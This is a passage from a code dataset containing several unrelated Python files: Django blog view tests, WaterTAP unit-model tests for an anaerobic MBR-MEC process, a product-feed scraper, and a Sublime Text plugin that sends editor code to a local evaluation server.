'title': 'Updated title',\n 'content': 'Updated content'\n }\n original_article = article\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, 302)\n\n updated_article = Article.objects.get(pk=1)\n self.assertNotEqual(original_article.title, updated_article.title)\n self.assertEqual(updated_article.title, 'Updated title')\n self.assertEqual(updated_article.content, 'Updated content')\n\n\nclass UserPageViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.user = mixer.blend('auth.User')\n cls.url = reverse('user_page', args=(cls.user.username,))\n\n def test_page_works(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blog/user_page.html')\n\n def test_page_raises_404_for_non_existent_username(self):\n self.url = reverse('user_page', args=('unknown',))\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 404)\n\n def test_page_works_and_returns_user_articles(self):\n \"\"\"\n The `user_page` returns all the user articles.\n \"\"\"\n response = self.client.get(self.url)\n self.assertQuerysetEqual(\n response.context['user_articles'],\n self.user.article_set.filter(publish=True)\n )\n\n\nclass LikeViewTests(TestCase):\n\n def test_like_article_by_unauthenticated_user(self):\n \"\"\"\n Uauthenticated users are redirected to the `login` page before they\n can like an article.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n url = reverse('like_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.like_set.count(), 0)\n\n def test_like_article_by_authenticated_user(self):\n \"\"\"\n Authenticated users can like articles.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('like_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.like_set.count(), 1)\n\n def test_undo_like(self):\n \"\"\"\n User can undo a like action by liking the article again.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('like_article', args=(article.slug, ))\n response = self.client.get(url)\n\n # like the article again\n response = self.client.get(url)\n self.assertEqual(article.like_set.count(), 0)\n\n\nclass DislikeViewTests(TestCase):\n\n def test_dislike_article_by_unauthenticated_user(self):\n \"\"\"\n Uauthenticated users are redirected to the `login` page before they\n can dislike an article.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n url = reverse('dislike_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.dislike_set.count(), 0)\n\n def test_dislike_article_by_authenticated_user(self):\n \"\"\"\n Aauthenticated users can dislike articles.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('dislike_article', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(article.dislike_set.count(), 1)\n\n def test_undo_dislike(self):\n \"\"\"\n User can undo a dislike action by disliking the article again.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n article = mixer.blend('blog.article', publish=True)\n url = reverse('dislike_article', args=(article.slug, ))\n response = self.client.get(url)\n\n # dislike the article again\n response = self.client.get(url)\n self.assertEqual(article.dislike_set.count(), 0)\n","sub_path":"blog/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":13109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49425199","text":"###############################################################################\n# WaterTAP Copyright (c) 2021, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National\n# Laboratory, National Renewable Energy Laboratory, and National Energy\n# Technology Laboratory (subject to receipt of any required approvals from\n# the U.S. Dept. of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#\n###############################################################################\n\"\"\"\nTests for zero-order anaerobic MBR-MEC model\n\"\"\"\nimport pytest\n\nfrom io import StringIO\nfrom pyomo.environ import (\n ConcreteModel,\n Constraint,\n value,\n Var,\n assert_optimal_termination,\n units as pyunits,\n)\nfrom pyomo.util.check_units import assert_units_consistent\n\nfrom idaes.core import FlowsheetBlock\nfrom idaes.core.util import get_solver\nfrom idaes.core.util.model_statistics import degrees_of_freedom\nfrom idaes.core.util.testing import initialization_tester\n\nfrom watertap.unit_models.zero_order import AnaerobicMBRMECZO\nfrom watertap.core.wt_database import Database\nfrom watertap.core.zero_order_properties import WaterParameterBlock\n\nsolver = get_solver()\n\n\nclass TestAnaerobicMBRMECZO:\n @pytest.fixture(scope=\"class\")\n def model(self):\n m = ConcreteModel()\n m.db = Database()\n\n m.fs = FlowsheetBlock(default={\"dynamic\": False})\n m.fs.params = WaterParameterBlock(\n default={\n \"solute_list\": [\n \"cod\",\n \"nonbiodegradable_cod\",\n \"ammonium_as_nitrogen\",\n \"phosphate_as_phosphorous\",\n ]\n }\n )\n\n m.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": m.fs.params, \"database\": m.db}\n )\n\n m.fs.unit.inlet.flow_mass_comp[0, \"H2O\"].fix(0.043642594)\n m.fs.unit.inlet.flow_mass_comp[0, \"cod\"].fix(1.00625e-4)\n m.fs.unit.inlet.flow_mass_comp[0, \"nonbiodegradable_cod\"].fix(1e-20)\n m.fs.unit.inlet.flow_mass_comp[0, \"ammonium_as_nitrogen\"].fix(4.59375e-06)\n m.fs.unit.inlet.flow_mass_comp[0, \"phosphate_as_phosphorous\"].fix(2.1875e-06)\n\n return m\n\n @pytest.mark.unit\n def test_build(self, model):\n assert model.fs.unit.config.database == model.db\n\n assert isinstance(model.fs.unit.electricity, Var)\n assert isinstance(model.fs.unit.energy_electric_flow_vol_inlet, Var)\n assert isinstance(model.fs.unit.electricity_consumption, Constraint)\n\n @pytest.mark.component\n def test_load_parameters(self, model):\n data = model.db.get_unit_operation_parameters(\"anaerobic_mbr_mec\")\n\n model.fs.unit.load_parameters_from_database(use_default_removal=True)\n\n assert model.fs.unit.recovery_frac_mass_H2O[0].fixed\n assert (\n model.fs.unit.recovery_frac_mass_H2O[0].value\n == data[\"recovery_frac_mass_H2O\"][\"value\"]\n )\n\n for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():\n assert v.fixed\n if j not in data[\"removal_frac_mass_solute\"].keys():\n assert v.value == data[\"default_removal_frac_mass_solute\"][\"value\"]\n else:\n assert v.value == data[\"removal_frac_mass_solute\"][j][\"value\"]\n\n assert model.fs.unit.energy_electric_flow_vol_inlet.fixed\n assert (\n model.fs.unit.energy_electric_flow_vol_inlet.value\n == data[\"energy_electric_flow_vol_inlet\"][\"value\"]\n )\n\n @pytest.mark.component\n def test_degrees_of_freedom(self, model):\n assert degrees_of_freedom(model.fs.unit) == 0\n\n @pytest.mark.component\n def test_unit_consistency(self, model):\n assert_units_consistent(model.fs.unit)\n\n @pytest.mark.component\n def test_initialize(self, model):\n initialization_tester(model)\n\n @pytest.mark.solver\n @pytest.mark.skipif(solver is None, reason=\"Solver not available\")\n @pytest.mark.component\n def test_solve(self, model):\n results = solver.solve(model)\n\n # Check for optimal solution\n assert_optimal_termination(results)\n\n @pytest.mark.solver\n @pytest.mark.skipif(solver is None, reason=\"Solver not available\")\n @pytest.mark.component\n def test_solution(self, model):\n assert pytest.approx(3780 / 3600 / 24 / 1000, rel=1e-5) == value(\n model.fs.unit.properties_in[0].flow_vol\n )\n assert pytest.approx(2.3, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"cod\"]\n )\n assert pytest.approx(0, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"nonbiodegradable_cod\"]\n )\n assert pytest.approx(0.105, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"ammonium_as_nitrogen\"]\n )\n assert pytest.approx(0.05, rel=1e-5) == value(\n model.fs.unit.properties_in[0].conc_mass_comp[\"phosphate_as_phosphorous\"]\n )\n\n assert pytest.approx(1500 / 3600 / 24 / 1000, rel=1e-2) == value(\n model.fs.unit.properties_treated[0].flow_vol\n )\n assert pytest.approx(2.8958, rel=1e-5) == value(\n model.fs.unit.properties_treated[0].conc_mass_comp[\"cod\"]\n )\n assert pytest.approx(4.60445e-05, rel=1e-5) == value(\n model.fs.unit.properties_treated[0].conc_mass_comp[\"nonbiodegradable_cod\"]\n )\n\n assert pytest.approx(2280 / 3600 / 24 / 1000, rel=1e-2) == value(\n model.fs.unit.properties_byproduct[0].flow_vol\n )\n assert pytest.approx(3.0331e-05, rel=1e-5) == value(\n model.fs.unit.properties_byproduct[0].conc_mass_comp[\"cod\"]\n )\n assert pytest.approx(1.90757, rel=1e-5) == value(\n model.fs.unit.properties_byproduct[0].conc_mass_comp[\"nonbiodegradable_cod\"]\n )\n assert pytest.approx(4.347, rel=1e-3) == value(\n pyunits.convert(\n model.fs.unit.properties_byproduct[0].flow_mass_comp[\n \"nonbiodegradable_cod\"\n ],\n to_units=pyunits.kg / pyunits.day,\n )\n )\n assert pytest.approx(0, abs=1e-5) == value(model.fs.unit.electricity[0])\n\n @pytest.mark.solver\n @pytest.mark.skipif(solver is None, reason=\"Solver not available\")\n @pytest.mark.component\n def test_conservation(self, model):\n for j in model.fs.params.component_list:\n assert 1e-6 >= abs(\n value(\n model.fs.unit.inlet.flow_mass_comp[0, j]\n + sum(\n model.fs.unit.generation_rxn_comp[0, r, j]\n for r in model.fs.unit.reaction_set\n )\n - model.fs.unit.treated.flow_mass_comp[0, j]\n - model.fs.unit.byproduct.flow_mass_comp[0, j]\n )\n )\n\n @pytest.mark.component\n def test_report(self, model):\n stream = StringIO()\n\n model.fs.unit.report(ostream=stream)\n\n output = \"\"\"\n====================================================================================\nUnit : fs.unit Time: 0.0\n------------------------------------------------------------------------------------\n Unit Performance\n\n Variables: \n\n Key : Value : Fixed : Bounds\n Electricity Demand : 8.0000e-10 : False : (0, None)\n Electricity Intensity : 0.0000 : True : (None, None)\n Reaction Extent [cod_to_nonbiodegradable_cod] : 5.0313e-05 : False : (None, None)\n Solute Removal [ammonium_as_nitrogen] : 0.0000 : True : (0, None)\n Solute Removal [cod] : 0.0000 : True : (0, None)\n Solute Removal [nonbiodegradable_cod] : 1.0000 : True : (0, None)\n Solute Removal [phosphate_as_phosphorous] : 0.0000 : True : (0, None)\n Water Recovery : 0.39680 : True : (1e-08, 1.0000001)\n\n------------------------------------------------------------------------------------\n Stream Table\n Inlet Treated Byproduct\n Volumetric Flowrate 4.3750e-05 1.7374e-05 2.6376e-05\n Mass Concentration H2O 997.55 996.71 998.09\n Mass Concentration cod 2.3000 2.8958 3.0331e-05\n Mass Concentration nonbiodegradable_cod 2.2857e-16 4.6045e-05 1.9076\n Mass Concentration ammonium_as_nitrogen 0.10500 0.26444 3.0331e-05\n Mass Concentration phosphate_as_phosphorous 0.050000 0.12595 3.0331e-05\n====================================================================================\n\"\"\"\n\n assert output in stream.getvalue()\n\n\ndb = Database()\nparams = db._get_technology(\"anaerobic_mbr_mec\")\n\n\nclass Test_AnMBRMEC_ZO_subtype:\n @pytest.fixture(scope=\"class\")\n def model(self):\n m = ConcreteModel()\n\n m.fs = FlowsheetBlock(default={\"dynamic\": False})\n m.fs.params = WaterParameterBlock(\n default={\"solute_list\": [\"cod\", \"nonbiodegradable_cod\"]}\n )\n\n m.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": m.fs.params, \"database\": db}\n )\n\n return m\n\n @pytest.mark.parametrize(\"subtype\", [params.keys()])\n @pytest.mark.component\n def test_load_parameters(self, model, subtype):\n model.fs.unit.config.process_subtype = subtype\n data = db.get_unit_operation_parameters(\"anaerobic_mbr_mec\", subtype=subtype)\n\n model.fs.unit.load_parameters_from_database()\n\n for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():\n assert v.fixed\n assert v.value == data[\"removal_frac_mass_solute\"][j][\"value\"]\n\n\n@pytest.mark.unit\ndef test_ffCOD_not_in_solute_list():\n model = ConcreteModel()\n model.db = Database()\n\n model.fs = FlowsheetBlock(default={\"dynamic\": False})\n model.fs.params = WaterParameterBlock(default={\"solute_list\": [\"cod\"]})\n with pytest.raises(\n ValueError,\n match=\"nonbiodegradable_cod must be included in the solute list since\"\n \" this unit model converts cod to nonbiodegradable_cod.\",\n ):\n model.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": model.fs.params, \"database\": model.db}\n )\n\n\n@pytest.mark.unit\ndef test_COD_not_in_solute_list():\n model = ConcreteModel()\n model.db = Database()\n\n model.fs = FlowsheetBlock(default={\"dynamic\": False})\n model.fs.params = WaterParameterBlock(\n default={\"solute_list\": [\"nonbiodegradable_cod\"]}\n )\n with pytest.raises(\n ValueError,\n match=\"fs.unit - key_reactant cod for reaction cod_to_nonbiodegradable_cod \"\n \"is not in the component list used by the assigned property package.\",\n ):\n model.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": model.fs.params, \"database\": model.db}\n )\n","sub_path":"watertap/unit_models/zero_order/tests/test_anaerobic_mbr_mec_zo.py","file_name":"test_anaerobic_mbr_mec_zo.py","file_ext":"py","file_size_in_byte":11384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"622769108","text":"# .-. coding=utf-8\nimport urllib2\nimport datetime\nfrom lxml import etree\nfrom kernel import collector\n\nLIST_URL = 'http://me-city.com/assets/collection-%s.xml'\nXPATH = '/Collection/Category/Product'\n\nclass CityMeCollector(collector.BaseCollector):\n display_name = \"CityMe\"\n\n def fetch(self):\n self.logger.info('City&Me started.')\n self.getData('women',u'女装') #女装\n self.getData('men',u'男装') #男装\n\n def getData(self, category, old_leibie):\n parser = etree.XMLParser(encoding='utf-8')\n self.logger.info('Category: %s:' % category)\n url = LIST_URL %(category)\n text = urllib2.urlopen(url).read()\n time = datetime.datetime.now().strftime('%Y-%m-%d')\n tree = etree.XML(text, parser=parser)\n nodes = tree.xpath(XPATH)\n for node in nodes:\n title = node.find('Title').text\n\n if u'内衣' in title or u'n内裤' in title or u'袜子' in title:\n continue\n\n if u'裙' in title:\n leibie = u'裙'\n elif u'裤' in title:\n leibie = u'裤'\n elif u'鞋' in title:\n leibie = u'鞋'\n elif u'包' in title:\n leibie = u'配饰'\n elif u'5239145' in title or u'装' in title or u'衣' in title or u'衫' in title\\\n or u'夹' in title or u'恤' in title:\n leibie = u'上装'\n else:\n continue\n\n\n price = node.find('Price').text\n\n image_url = u'http://me-city.com/'+node.find('FullImage').text\n\n\n self.logger.info('%s:%s(%s) - %s @ %s' % (leibie, title, price, image_url, image_url))\n collector.object_found.send(\n self,\n time = time, title = title, url = image_url,\n image_url = image_url,\n price = price,\n leibie = leibie\n )\n from shopping.signals import item_found\n item_found.send(\n self,\n name = title,\n url = image_url,\n brand = self.__class__.__name__,\n image_url = image_url,\n image_url2 = None,\n price = price,\n category = leibie,\n )\n","sub_path":"collectors/shopping/city_me.py","file_name":"city_me.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15556057","text":"import sublime, sublime_plugin\nimport socket\nimport time\nimport threading\nimport os\nimport subprocess\nimport re\n\nfrom .rapid_output import RapidOutputView\nfrom .rapid_parse import RapidSettings\nfrom .rapid_debug import *\n\n# to run execute from the console:\n# view.run_command('rapid_eval')\n\nclass RapidConnectionThread(threading.Thread):\n\tinstance = None\n\t\n\tdef __init__(self):\n\t\tself.host = \"localhost\"\n\t\tsettings = RapidSettings().getSettings()\n\t\tif \"Host\" in settings:\n\t\t\tself.host = settings[\"Host\"]\n\n\t\tself.port = 4444\n\t\tself.sock = None\n\t\tself.running = False\n\n\t\ttry:\n\t\t\tthreading.Thread.__init__(self)\n\t\t\tself.sock = socket.create_connection((self.host, self.port))\n\t\t\t#RapidOutputView.printMessage(\"Connected to \" + self.host + \".\")\n\t\t\tRapidConnectionThread.instance = self\n\t\texcept OSError as e:\n\t\t\tRapidOutputView.printMessage(\"Failed to connect to rapid server:\\n\" + str(e) + \"\\n\")\n\n\tdef run(self):\n\t\tself.running = True\n\t\tdataQueue = []\n\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\t#data = self.sock.recv(1).decode()\n\t\t\t\t\n\t\t\t\tdata = self.sock.recv(1)\n\t\t\t\tdata = self.decodeData(data)\n\n\t\t\t\tif not data:\n\t\t\t\t\tbreak;\n\n\t\t\t\tif data != '\\000':\n\t\t\t\t\tdataQueue.append(data)\n\n\t\t\t\tif data == '\\n' or data == '\\000':\n\t\t\t\t\tif dataQueue: #dataQueue is not empty\n\t\t\t\t\t\tdatastr = \"\".join(dataQueue)\n\t\t\t\t\t\tself.receiveString(datastr)\n\t\t\t\t\tdel dataQueue[:]\n\t\texcept socket.error:\n\t\t\tRapidOutputView.printMessage(\"Socket error\")\n\t\texcept:\n\t\t\tRapidOutputView.printMessage(\"Error\")\n\n\t\tself.sock.close()\n\t\tself.running = False\n\t\tdel self.sock\n\t\tRapidOutputView.printMessage(\"Connection terminated\")\n\n\tdef decodeData(self, data):\n\t\t#avoid error if received data is non-ascii (print space instead)\n\t\ttry:\n\t\t\tchar = data.decode()\n\t\texcept UnicodeDecodeError:\n\t\t\tchar = \" \"\n\t\treturn char\n\n\tdef isRunning(self):\n\t\treturn self.running \n\n\tdef receiveString(self, msg):\n\t\t# called when a string is received from the app\n\t\t#print(\"received: \" + msg)\n\n\t\t# process debug commands\n\t\tif msg.startswith(\"#\"):\n\t\t\tRapidDebug.execDebugCommand(msg)\n\n\t\tRapidOutputView.printMessage(msg)\n\n\tdef sendString(self, msg):\n\t\t#ignore non-ascii characters when sending\n\t\t#msg = msg.encode('ascii', 'ignore')\n\t\t\n\t\tself.sock.send(msg.encode())\n\n\t@staticmethod\n\tdef checkConnection():\n\t\tif RapidConnectionThread.instance == None:\n\t\t\tRapidConnect()\n\t\t\tRapidConnectionThread().start()\n\t\telif not RapidConnectionThread.instance.isRunning():\n\t\t\tRapidConnectionThread.instance.join()\n\t\t\tRapidConnect()\n\t\t\tRapidConnectionThread().start()\n\nclass RapidResumeCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tRapidConnectionThread.checkConnection()\n\t\tRapidConnectionThread.instance.sendString(\"\\nsys.resume()\\000\")\n\nclass RapidHelpCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tcursor_pos = self.view.sel()[0].begin()\n\t\tregion = self.view.word(cursor_pos)\n\t\tword = self.view.substr(region)\n\t\t#print(\"Sending word: \" + word)\n\t\tRapidConnectionThread.checkConnection()\n\t\tline = \"\\nrequire(\\\"doc\\\"); doc.find([[\"+ word +\"]])\\000\"\n\t\tRapidConnectionThread.instance.sendString(line)\n\nclass RapidEvalCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\n\t\t#do not evaluate python files\n\t\tif self.view.file_name() != None and self.view.file_name().endswith(\"py\"):\n\t\t\tprint(\"cannot evaluate python files\")\n\t\t\treturn\n\n\t\tRapidConnectionThread.checkConnection()\n\t\tline_contents = self.getLines()\n\t\tRapidConnectionThread.instance.sendString(line_contents)\n\n\t# Checks if the cursor is inside lua function() block\n\tdef checkBlock(self, view, current_row, line_contents, cursor_pos):\n\t\t#added special case check for comments inside a block which might have no indentation\n\t\tif self.view.indentation_level(cursor_pos) > 0 \\\n\t\tor ( self.view.indentation_level(cursor_pos) == 0 \\\n\t\tand line_contents.startswith(\"--\") ):\n\t\t\treturn True\n\t\telif line_contents.strip() == '':\n\t\t\t# cursor might be on an empty unintended row inside block\n\t\t\tstart_row = current_row\n\t\t\tend_row = current_row\n\t\t\tindex = 1\n\n\t\t\t# find first previous non-empty row\n\t\t\tblock_start = False\n\t\t\twhile not block_start:\n\t\t\t\tstart_row = current_row - index\n\t\t\t\tstart_pos = self.view.text_point(start_row, 0)\n\t\t\t\tstart_line = self.view.full_line(start_pos)\n\t\t\t\tstart_line_contents = self.view.substr(start_line)\n\t\t\t\tif start_line_contents.strip() != '':\n\t\t\t\t\tblock_start = True\n\t\t\t\telse:\n\t\t\t\t\tindex = index + 1\n\n\t\t\t#find first next non-empty row\n\t\t\tindex = 1\n\t\t\tblock_end = False\n\t\t\twhile not block_end:\n\t\t\t\tend_row = current_row + index\n\t\t\t\tend_pos = self.view.text_point(end_row, 0)\n\t\t\t\tend_line = self.view.full_line(end_pos)\n\t\t\t\tend_line_contents = self.view.substr(end_line)\n\t\t\t\tif end_line_contents.strip() != '':\n\t\t\t\t\tblock_end = True\n\t\t\t\telse:\n\t\t\t\t\tindex = index + 1\n\n\t\t\t# Assume that the cursor is inside a function block if:\n\t\t\t# 1) start_row and end_row have indentation level > 0 OR\n\t\t\t# 2) start_row has indentation level > 0 and end_row starts with \"end\" OR\n\t\t\t# 3) start_row starts with \"function\" or \"local function\" and end_row indentation level > 0\n\t\t\tif (self.view.indentation_level(start_pos) > 0 and self.view.indentation_level(end_pos) > 0):\n\t\t\t\treturn True\n\t\t\telif (self.view.indentation_level(start_pos) > 0 \\\n\t\t\t\tand self.view.indentation_level(end_pos) == 0 and end_line_contents.startswith(\"end\")):\n\t\t\t\treturn True\n\t\t\telif (self.view.indentation_level(start_pos) == 0 and self.view.indentation_level(end_pos) > 0) \\\n\t\t\t\tand (start_line_contents.startswith(\"function\") or start_line_contents.startswith(\"local function\")):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn False\n\n\tdef getLines(self):\n\t\tfor region in self.view.sel():\n\t\t\tcursor_pos = self.view.sel()[0].begin()\n\t\t\tcurrent_row = self.view.rowcol(cursor_pos)[0]\n\n\t\t\tif region.empty():\n\t\t\t\t#check if we are evaluating a block instead of line\n\t\t\t\tline = self.view.full_line(region)\n\t\t\t\tline_contents = self.view.substr(line)\n\t\t\t\t\n\t\t\t\t# if self.view.indentation_level(cursor_pos) > 0 \\\n\t\t\t\t# or ( self.view.indentation_level(cursor_pos) == 0 \\\n\t\t\t\t# and line_contents.startswith(\"--\") ):\n\n\t\t\t\t#eval block\n\t\t\t\tif self.checkBlock(self.view, current_row, line_contents, cursor_pos) == True:\n\t\t\t\t\tstart_row = current_row\n\t\t\t\t\tend_row = current_row\n\t\t\t\t\tindex = 1\n\n\t\t\t\t\t#find start of the block\n\t\t\t\t\tblock_start = False\n\t\t\t\t\twhile not block_start:\n\t\t\t\t\t\tstart_row = current_row - index\n\t\t\t\t\t\tstart_pos = self.view.text_point(start_row, 0)\n\t\t\t\t\t\tstart_line = self.view.full_line(start_pos)\n\t\t\t\t\t\tstart_line_contents = self.view.substr(start_line)\n\t\t\t\t\t\tif self.view.indentation_level(start_pos) == 0 \\\n\t\t\t\t\t\tand\tstart_line_contents.strip() != '' \\\n\t\t\t\t\t\tand\tnot start_line_contents.startswith(\"--\"):\n\t\t\t\t\t\t\tblock_start = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tindex = index + 1\n\n\t\t\t\t\t#find end of the block\n\t\t\t\t\tindex = 1\n\t\t\t\t\tblock_end = False\n\t\t\t\t\twhile not block_end:\n\t\t\t\t\t\tend_row = current_row + index\n\t\t\t\t\t\tend_pos = self.view.text_point(end_row, 0)\n\t\t\t\t\t\tend_line = self.view.full_line(end_pos)\n\t\t\t\t\t\tend_line_contents = self.view.substr(end_line)\n\t\t\t\t\t\tif self.view.indentation_level(end_pos) == 0 \\\n\t\t\t\t\t\tand end_line_contents.strip() != '' \\\n\t\t\t\t\t\tand not end_line_contents.startswith(\"--\"):\n\t\t\t\t\t\t\tblock_end = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tindex = index + 1\n\t\t\t\t\t\n\t\t\t\t\tstart_offset = self.view.text_point(start_row, 0)\n\t\t\t\t\tend_offset = self.view.text_point(end_row+1, 0)\n\t\t\t\t\tblock_region = sublime.Region(start_offset, end_offset)\n\t\t\t\t\tline = self.view.full_line(block_region)\n\n\t\t\t\t\tfile_row = start_row\n\t\t\t\t\t#print(\"Sending: \" + str(file_row))\n\t\t\t\t\tmsg = \"Updating \" + start_line_contents\n\t\t\t\t\tRapidOutputView.printMessage(msg)\n\t\t\t\t\tfile_row_str = str(file_row + 1)\n\t\t\t\telse:\n\t\t\t\t\tline = self.view.line(region) #expand the region for full line if no selection\n\t\t\t\t\tfile_row_str = str(current_row + 1)\n\t\t\telse:\n\t\t\t\tline = region #get only the selected area\n\t\t\t\tfile_row_str = str(current_row + 1)\n\n\t\t\tfile_name = self.view.file_name() or \"\"\n\t\t\t\n\t\t\tif len(file_name) > 0:\n\t\t\t\t# we always want to send only relative paths if possible, so\n\t\t\t\t# try to convert the filename to a relative path\n\t\t\t\tfor window in sublime.windows():\n\t\t\t\t\tfor folder in window.folders():\n\t\t\t\t\t\tif file_name.startswith(folder):\n\t\t\t\t\t\t\tfile_name = os.path.relpath(file_name, folder)\n\n\t\t\t# replace possible backslashes with forward ones\n\t\t\tfile_name = file_name.replace(\"\\\\\", \"/\")\n\n\t\t\tline_str = self.view.substr(line)\n\t\t\tline_contents = \"@\" + file_name + \":\" + file_row_str + \"\\n\" + line_str + \"\\000\"\n\t\t\t\n\t\t\t#print(\"------\")\n\t\t\t#print(\"Sending: \", file_name)\n\t\t\t#print(\"Sending contents:\")\n\t\t\t#print(line_contents)\n\t\t\t#print(\"------\")\n\t\t\treturn line_contents\n\nclass RapidCheckServerAndStartupProjectCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.view = self.window.active_view()\n\t\tself.view.run_command('rapid_output_view_clear')\n\n\t\t#Check if startup project exists and if it has been modified\n\t\tstartup_exists = False\n\t\tis_modified = False\n\n\t\t#RapidOutputView.printMessage(\"Loading project settings...\")\n\t\tstartup_path = RapidSettings().getStartupFilePath()\n\t\tRapidOutputView.printMessage(\"Startup path: \" + startup_path)\n\n\t\tif startup_path:\n\t\t\tstartup_exists = True\n\t\t\tnew_view = sublime.active_window().find_open_file(startup_path)\n\t\t\tif new_view != None and new_view.is_dirty():\n\t\t\t\tis_modified = True\n\t\telif self.view.is_dirty():\n\t\t\tis_modified = True\n\n\t\t#Send commands to server accordingly\n\t\tRapidConnectionThread.checkConnection()\n\t\tif startup_exists:\n\t\t\t#always load project, even if it is open and modified (modifications are loaded only after saving)\n\t\t\tRapidOutputView.printMessage(\"Startup project: \" + startup_path)\n\t\t\tline = \"\\nsys.loadProject([[\" + startup_path + \"]])\\000\"\n\t\t\tRapidConnectionThread.instance.sendString(line)\n\t\telse:\n\t\t\t#if no startup project, run current page\n\t\t\tif is_modified:\n\t\t\t\t#file has not been saved - restart runtime engine and send code over\n\t\t\t\tRapidConnectionThread.instance.sendString(\"\\nsys.restart()\\000\")\n\t\t\t\tline = \"@\" + self.view.file_name() + \":1\\n\" + self.view.substr(sublime.Region(0, self.view.size())) + \"\\000\"\n\t\t\t\tRapidConnectionThread.instance.sendString(line)\n\t\t\telse:\n\t\t\t\t#file is up to date -> reload file - this is faster than sending the code\n\t\t\t\tRapidConnectionThread.instance.sendString(\"\\nsys.loadProject([[\" + self.view.file_name() + \"]])\\000\")\n\nclass RapidConnect():\n\tdef __init__(self):\n\t\n\t\t#print(\"rapidconnect\")\n\n\t\t#rapid_exe = sublime.active_window().active_view().settings().get(\"RapidExe\")\n\t\tsettings = RapidSettings().getSettings()\n\t\trapid_exe = settings[\"RapidExe\"]\n\n\t\tif os.name == \"nt\":\n\t\t\t# check if rapid is already running\t\n\t\t\trapid_running = True\n\t\t\trapid = subprocess.check_output(\"tasklist /FI \\\"IMAGENAME eq \" + rapid_exe + \".exe\\\" /FO CSV\")\n\t\t\trapid_search = re.search(rapid_exe + \".exe\", rapid.decode(\"ISO-8859-1\"))\n\t\t\tif rapid_search == None:\n\t\t\t\trapid_debug = subprocess.check_output(\"tasklist /FI \\\"IMAGENAME eq \" + rapid_exe + \"_d.exe\\\" /FO CSV\")\n\t\t\t\trapid_debug_search = re.search(rapid_exe + \"_d.exe\", rapid_debug.decode(\"ISO-8859-1\"))\n\t\t\t\tif rapid_debug_search == None:\n\t\t\t\t\trapid_running = False\n\t\t\tif rapid_running:\n\t\t\t\treturn\t\n\t\telif os.name == \"posix\":\n\t\t\tdata = subprocess.Popen(['ps','aux'], stdout=subprocess.PIPE).stdout.readlines() \n\t\t\trapid_running = False\n\t\t\tfor line in data:\n\t\t\t\tlineStr = line.decode(\"utf-8\")\n\t\t\t\tif lineStr.find(rapid_exe) > -1 and lineStr.find(os.getlogin()) > -1:\n\t\t\t\t\tprint(\"Rapid executable is already running for user: \" + os.getlogin())\n\t\t\t\t\tprint(lineStr)\n\t\t\t\t\trapid_running = True\n\t\t\t\t\tbreak\n\t\t\tif rapid_running:\n\t\t\t\treturn\n\n\t\tif \"Host\" in settings and settings[\"Host\"] != \"localhost\":\n\t\t\treturn\n\n\t\tif os.name == \"nt\":\n\t\t\trapid_path = settings[\"RapidPathWin\"]\n\t\telif os.name == \"posix\":\n\t\t\tos.chdir(RapidSettings().getStartupProjectPath()) \n\t\t\trapid_path = os.path.realpath(settings[\"RapidPathOSX\"])\n\t\telse:\n\t\t\tRapidOutputView.printMessage(\"Could not find \\\"RapidPath\\\" variable from projects' rapid_sublime -file!\")\n\t\t\treturn\n\n\t\tif rapid_path != None and rapid_exe != None:\n\t\t\tRapidOutputView.printMessage(\"Starting \" + rapid_exe)\n\t\t\tfull_path = os.path.abspath(os.path.join(rapid_path, rapid_exe))\n\t\t\tsubprocess.Popen(full_path, cwd=rapid_path)\n\t\t\tif os.name == \"posix\":\n\t\t\t\ttime.sleep(0.5) #small delay to get server running on OSX\n\t\telse:\n\t\t\tRapidOutputView.printMessage(\"Could not start server 